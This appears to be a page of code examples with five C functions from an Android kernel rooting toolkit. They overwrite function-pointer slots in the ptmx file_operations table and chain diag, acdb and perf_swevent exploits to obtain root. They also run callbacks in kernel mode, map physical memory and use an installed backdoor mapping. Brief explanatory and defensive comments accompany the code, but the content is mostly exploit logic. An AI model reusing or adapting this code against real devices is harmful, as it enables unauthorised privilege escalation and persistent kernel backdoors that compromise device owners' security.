Exemplo n.º 1
/*
 * Try three helpers in a fixed order (diag, acdb, perf_swevent) against one
 * target address, stopping at the first one that reports success.
 *
 * The target is get_ptmx_fops_address() + 0x38. Going by the original local's
 * name this is presumably the fsync slot of the ptmx file_operations table on
 * the kernel build this was written for; the offset is hard-coded and is not
 * validated here.
 *
 * Returns false when the ptmx fops address is unavailable (0); otherwise true
 * as soon as a helper succeeds, or the result of the last helper.
 *
 * Defensive note: every step presupposes that the address of the ptmx ops
 * table is known and that a function-pointer slot in it can be overwritten.
 * Read-only ops tables and restricted exposure of kernel addresses remove
 * those preconditions.
 */
static bool
run_exploit(void)
{
  unsigned long int fops_base = get_ptmx_fops_address();
  unsigned long int fsync_slot;
  bool succeeded;

  if (fops_base == 0) {
    return false;
  }

  fsync_slot = fops_base + 0x38;

  succeeded = attempt_diag_exploit(fsync_slot);
  if (!succeeded) {
    printf("\n");

    printf("Attempt acdb exploit...\n");
    succeeded = attempt_acdb_exploit(fsync_slot, 0);
    if (!succeeded) {
      printf("\n");

      printf("Attempt perf_swevent exploit...\n");
      /*
       * NOTE(review): the (int) cast of a function address truncates where
       * pointers are wider than int; presumably this targets 32-bit only --
       * confirm against perf_swevent_run_exploit's prototype.
       */
      succeeded = perf_swevent_run_exploit(fsync_slot, (int)&obtain_root_privilege,
                                           run_obtain_root_privilege, NULL);
    }
  }

  return succeeded;
}
Exemplo n.º 2
/*
 * Temporarily store load_msmsdcc at (ptmx fops address + 0x38), call
 * run_load_msmsdcc(NULL), then clear the slot again and release the mapping.
 *
 * The write goes through the address returned by
 * backdoor_convert_to_mmaped_address(), i.e. through a mapping that
 * backdoor_open_mmap() must have set up first. If that mapping is
 * unavailable the function prints the errno text plus a hint and gives up.
 *
 * Returns false when the ptmx fops address is unknown or the mapping cannot
 * be opened; otherwise whatever run_load_msmsdcc() returned.
 *
 * Defensive note: the slot is written and then reset to NULL (not to its
 * previous value), so a NULL entry at this offset after the fact is a
 * possible artifact of this code having run.
 */
static bool
run_exploit(void)
{
  unsigned long int fops_base = get_ptmx_fops_address();
  void **hook_slot;
  bool result;

  if (fops_base == 0) {
    return false;
  }

  if (!backdoor_open_mmap()) {
    printf("Failed to mmap due to %s.\n", strerror(errno));
    printf("Run 'install_backdoor' first\n");

    return false;
  }

  /*
   * NOTE(review): the converted address is dereferenced without a check;
   * whether the conversion helper can fail is not visible from here.
   */
  hook_slot = backdoor_convert_to_mmaped_address((void *)(fops_base + 0x38));

  /* Install, run, and uninstall strictly in this order. */
  *hook_slot = load_msmsdcc;
  result = run_load_msmsdcc(NULL);
  *hook_slot = NULL;

  backdoor_close_mmap();
  return result;
}
Exemplo n.º 3
/*
 * Thin wrapper: look up the ptmx fops address and forward the mapping request
 * to fops_map_physical_memory() with PTMX_DEVICE and FOPS_RUN_BY_EXPLOIT.
 *
 * map_address, physical_address and size are passed through unchanged; no
 * range or alignment validation happens at this level.
 *
 * Returns false if the ptmx fops address is unavailable (0), otherwise the
 * result of fops_map_physical_memory().
 */
bool ptmx_map_memory(unsigned long int map_address, unsigned long int physical_address, unsigned long int size)
{
  unsigned long int fops_base = get_ptmx_fops_address();

  if (fops_base == 0) {
    return false;
  }

  return fops_map_physical_memory((void *)fops_base,
                                  PTMX_DEVICE,
                                  FOPS_RUN_BY_EXPLOIT,
                                  map_address,
                                  physical_address,
                                  size);
}
Exemplo n.º 4
/*
 * Thin wrapper: look up the ptmx fops address and hand `function` and
 * `user_data` to fops_run_in_kernel_mode() with PTMX_DEVICE and
 * FOPS_RUN_BY_KERNEL_MEMORY.
 *
 * Neither `function` nor `user_data` is inspected here (a NULL callback is
 * forwarded as-is).
 *
 * Returns false if the ptmx fops address is unavailable (0), otherwise the
 * result of fops_run_in_kernel_mode().
 */
bool ptmx_run_in_kernel_mode(bool (*function)(void *), void *user_data)
{
  unsigned long int fops_base = get_ptmx_fops_address();

  if (fops_base == 0) {
    return false;
  }

  return fops_run_in_kernel_mode((void *)fops_base,
                                 PTMX_DEVICE,
                                 FOPS_RUN_BY_KERNEL_MEMORY,
                                 function,
                                 user_data);
}
Exemplo n.º 5
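/*
 * Pick a lookup helper based on diag_is_supported() and run it against
 * (ptmx fops address + 0x28).
 *
 * Going by the local's name, 0x28 is presumably the mmap slot of the ptmx
 * file_operations table on the kernel build this was written for; the offset
 * is hard-coded and is not validated here.
 *
 * Returns false when the ptmx fops address is unavailable (0); otherwise the
 * result of the selected helper.
 */
static bool
find_creds_functions_in_memory(void)
{
    unsigned long int ptmx_fops_address;
    unsigned long int ptmx_mmap_address;

    /*
     * A zero return means the address could not be determined. Without this
     * check the offset would be added to 0 and the bogus value 0x28 would be
     * passed on as if it were a kernel address.
     */
    ptmx_fops_address = get_ptmx_fops_address();
    if (!ptmx_fops_address) {
        return false;
    }

    ptmx_mmap_address = ptmx_fops_address + 0x28;

    if (diag_is_supported()) {
        return find_with_diag_exploit(ptmx_mmap_address);
    }
    return find_with_perf_swevent_exploit(ptmx_mmap_address);
}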